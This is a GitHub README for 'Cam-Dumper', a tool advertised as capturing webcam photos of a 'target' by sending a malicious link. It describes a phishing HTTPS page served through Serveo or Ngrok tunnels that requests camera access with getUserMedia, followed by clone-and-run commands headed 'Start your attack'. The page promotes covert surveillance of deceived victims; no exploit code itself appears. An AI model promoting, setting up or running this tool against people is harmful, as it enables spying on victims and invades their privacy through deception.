Skip to content

Latest commit

 

History

History
75 lines (47 loc) · 2.23 KB

README.md

File metadata and controls

75 lines (47 loc) · 2.23 KB

Welcome to repositories of Cam-Dumper



Take webcam shots from target by just sending a malicious link

How it works?

The tool generates a malicious HTTPS page using Serveo or Ngrok Port Forwarding methods, and a javascript code to cam requests using MediaDevices.getUserMedia.

The MediaDevices.getUserMedia() method prompts the user for permission to use a media input which produces a MediaStream with tracks containing the requested types of media. That stream can include, for example, a video track (produced by either a hardware or virtual video source such as a camera, video recording device, screen sharing service, and so forth), an audio track (similarly, produced by a physical or virtual audio source like a microphone, A/D converter, or the like), and possibly other track types.

See more about MediaDEvices.getUserMedia() here

Installation

Update

$ apt update && apt upgrade

To get php

$ apt install git php wget curl jq

Git Clone

$ git clone https://github.com/AnandKatariya/Cam-Dumper

Get the path

$ cd CAM-DUMPER

Get the connection

$ chmod +x camdumper.sh

Start your attack

$ ./camdumper.sh

Author

👤 Anand Katariya

🤝 Contributing

Contributions, issues and feature requests are welcome!
Feel free to check issues page.

Show your support

Give a ⭐️ if this project helped you!
Stay tuned for more updates.